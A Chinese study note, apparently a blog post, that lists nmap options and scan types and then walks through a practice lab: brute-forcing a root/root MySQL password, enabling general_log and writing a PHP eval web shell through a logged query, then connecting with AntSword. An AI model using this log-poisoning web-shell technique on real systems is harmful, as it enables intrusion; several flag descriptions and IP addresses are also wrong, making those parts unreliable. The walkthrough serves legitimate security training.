8月5日笔记

8月5日

nmap命令使用

nmap四种基本功能:端口扫描、主机探测、服务识别、系统识别。

复制代码
nmap ip

默认情况下,nmap 会对目标执行 TCP 端口扫描,尝试找出哪些端口是开放的,并提供关于这些端口上运行的服务的一些基本信息。

其他参数:

  • -sV: 用于进行服务版本检测。
  • -O: 用于尝试识别目标主机的操作系统。
  • -A: 结合 -sV-O,进行更全面的扫描。
  • -p: 指定要扫描的端口,例如 -p 80,443
  • -v: 显示详细输出。
  • -vv: 更详细的输出。
  • -n: 不进行 DNS 反向解析。
  • -R: 总是进行 DNS 反向解析。
  • -iD: 使用多线程进行主机发现。
  • -sS: SYN 扫描(默认)。发送一个 SYN 数据包,如果收到 SYN/ACK,则认为端口开放。
  • -sT: TCP 连接扫描。完成完整的三次握手建立连接,可能会留下日志记录。
  • -sU: UDP 扫描。发送 UDP 数据包,如果收到 ICMP 端口不可达消息,则认为端口关闭;如果没有回应,则认为端口开放。
  • -sC: 执行默认的脚本扫描。
  • -sA: ACK 扫描。发送 ACK 数据包,主要用于检测防火墙的过滤规则。
  • -sW: Window 扫描。发送带有窗口大小的 SYN 数据包,用于确定目标是否存活。
  • -sM: ICMP 扫描。发送 ICMP 数据包,用于确定目标是否存活。
  • -sI: IDLE 扫描。使用第三方主机作为跳板,隐蔽地进行扫描。
  • -sX: XMAS 扫描。发送带有 FIN, URG, 和 PSH 标志位的数据包,用于确定端口状态。
  • -sF: FIN 扫描。发送带有 FIN 标志位的数据包,用于确定端口状态。
  • -sN: NULL 扫描。发送没有任何标志位的数据包,用于确定端口状态。
  • -T: 设置扫描时间策略。范围从 T1 (最慢) 到 T5 (最快),默认是 T3
  • -T4: 设置扫描时间为较快的速度。
  • -T5: 设置扫描时间为最快的速度。
  • -f: 分段扫描,用于绕过某些类型的防火墙。
  • --script: 指定一个或多个脚本进行扫描。例如 --script vuln 将运行所有漏洞相关的脚本。
  • --script-args: 向脚本传递参数。
  • --script-help: 显示脚本的帮助信息。

端口扫描

扫描指定端口

复制代码
nmap 192.168.5.138 -p 80
nmap 192.168.5.138 -p 1-80
nmap 192.168.5.138 -p 80,3389,22,21
nmap 192.168.5.138 -p 1-65535
nmap 192.168.5.138 -p-		# -p- 等价于 -p 1-65535

主机探测

扫描网段中有哪些主机在线,使用 -sP 参数,只扫描存活主机,不扫描端口。

复制代码
nmap -sP 192.168.5.0/24

服务识别

扫描端口时,默认显示端口对应的服务,但不显示服务版本。

想要识别具体的服务版本,使用-sV参数。

复制代码
nmap 192.168.5.138 -p -sV

系统识别

使用参数 -O

复制代码
nmap 192.168.5.138 -p 80 -O

Nmap扫描出的系统版本并完全准确,仅供参考。

当识别不出具体版本时,Nmap会以概率的形式列举出可能的操作系统

导出扫描结果

复制代码
nmap 192.168.5.138 -p 80 -oN result.txt

红日靶场打靶

拿到ip:192.168.5.138

首先用nmap扫描看看。

复制代码
namp -sV -Pn 192.168.48.144

使用Pn是为了进行隐蔽扫描,可以减少扫描过程中产生的网络活动,从而降低被检测的风险。

发现开着http和mysql服务。打开网站。发现是phpstudy探针,网站可能是phpstudy搭建的。

mysql开着,看看是否存在弱口令。

bp爆破出root,root弱口令。

御剑扫描目录。

发现数据库后台地址。使用弱口令登录。

查看是否有开启日志记录

复制代码
show variables like '%general%';

设置路径。

开启日志读写功能

复制代码
SET GLOBAL general_log='on'; 

添加木马。

复制代码
select 1;/*'<?php eval ($_POST['cmd']);?>'*/
复制代码
select 1;/*'<?php eval ($_POST['cmd']);?>'*/

蚁剑连接成功。

相关推荐
茉莉玫瑰花茶16 分钟前
socket套接字-UDP(中)
网络·网络协议·udp
序属秋秋秋17 分钟前
《数据结构初阶》【顺序表 + 单链表 + 双向链表】
c语言·数据结构·笔记·链表
草莓熊Lotso42 分钟前
【C语言操作符详解(一)】--进制转换,原反补码,移位操作符,位操作符,逗号表达式,下标访问及函数调用操作符
c语言·经验分享·笔记
灏瀚星空1 小时前
从基础到实战的量化交易全流程学习:1.3 数学与统计学基础——概率与统计基础 | 基础概念
笔记·python·学习·金融·概率论
一夜沐白1 小时前
Linux用户管理
linux·运维·服务器·笔记
triticale2 小时前
《人件》第三章 正确的人
笔记
阳光宅男@李光熠2 小时前
【质量管理】TRIZ(萃智)的工程系统进化法则
笔记·学习
Suckerbin2 小时前
pikachu靶场-敏感信息泄露
网络·学习·安全·网络安全
什么问题2 小时前
Comfy UI 笔记
笔记·comfy ui
嘿嘿-g2 小时前
华为IP(5)
网络·华为